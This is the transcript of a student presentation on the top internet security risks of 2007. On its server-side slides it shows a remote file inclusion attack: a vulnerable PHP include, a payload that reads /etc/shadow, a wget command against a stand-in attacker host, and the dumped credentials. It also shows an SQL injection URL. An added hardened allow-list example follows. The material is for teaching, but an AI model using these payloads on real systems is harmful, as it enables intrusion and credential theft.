internet security
DESCRIPTION
Presentation in English for first-year students at the Institute of Technology of Saint-Malo: Top-10 2007 Security Risks
TRANSCRIPT
Yohann Lepage – Vincent Palierne
Top-10 2007 Security Risks
Wednesday 6th May 2008
INTERNET SECURITY
Summary
Client-side Vulnerabilities
Diagram: Client, Network (Internet), Server
Vulnerabilities
Software
Web Browsers
Email Clients
Media Players
Client-Side Vulnerabilities
Server-Side Vulnerabilities
Diagram: Client, Network (Internet), Server
Vulnerabilities
Web Applications
Hacker www.mysite.com/index.php
index.php:
<?php
// $page carries the ?page= value from the request and is not validated
include($page.'.php');
?>
cat.php, hosted at www.badguy.ru/cat.php:
<?php passthru("cat /etc/shadow"); ?>
$> wget www.mysite.com/index.php?page=www.haxor.com/cat
Network (Internet)
USER:PASSWORD
root:S5AçéZl~]
Linus:@ée)&#$*^%
Httpd:Jpzi5z@°
www.mysite.com/index.php
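The include($page.'.php') call on this slide hands the request parameter straight to include. A hardened index.php, as an added example that is not part of the original slides (the page names and the pages/ directory are assumptions):

```php
<?php
// Added example, not from the original slides. The page names and the
// pages/ directory are assumptions made for illustration.

// Fixed allow-list: request value => file shipped with the application.
const PAGES = [
    'home'    => 'home.php',
    'news'    => 'news.php',
    'contact' => 'contact.php',
];

/**
 * Map the untrusted ?page= value to a local file, or null if it is not
 * on the allow-list. The request value is only ever used as an array
 * key, so it never becomes part of the path handed to include.
 */
function resolve_page($requested, string $baseDir): ?string
{
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    return rtrim($baseDir, '/') . '/' . PAGES[$requested];
}

// Constructed sample inputs: one legitimate value, then the value from
// the slide, a full URL, a path traversal and a non-string parameter.
$samples = ['news', 'www.haxor.com/cat', 'http://www.badguy.ru/cat',
            '../../etc/shadow', ['news']];

foreach ($samples as $input) {
    $path = resolve_page($input, __DIR__ . '/pages');
    printf("%-28s => %s\n", json_encode($input, JSON_UNESCAPED_SLASHES),
           $path === null ? 'rejected (404)' : $path);
}

// In index.php the call site would look like this:
//   $path = resolve_page($_GET['page'] ?? 'home', __DIR__ . '/pages');
//   if ($path === null) { http_response_code(404); exit; }
//   include $path;
```

Keeping allow_url_include disabled in php.ini (its default) is a second layer, since it stops include from fetching URLs at all.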
Vulnerabilities
Database Software
http://localhost/admin.php?module=news&id= -1 union select 0,1,database(),3,4,5,6,7 from membres--
Security Policy and Personnel
Phishing/Spear Phishing
Application Abuse
Instant Messaging
Peer-to-Peer Programs
Zero Day Attacks
Conclusion
Internet security is hard because:
End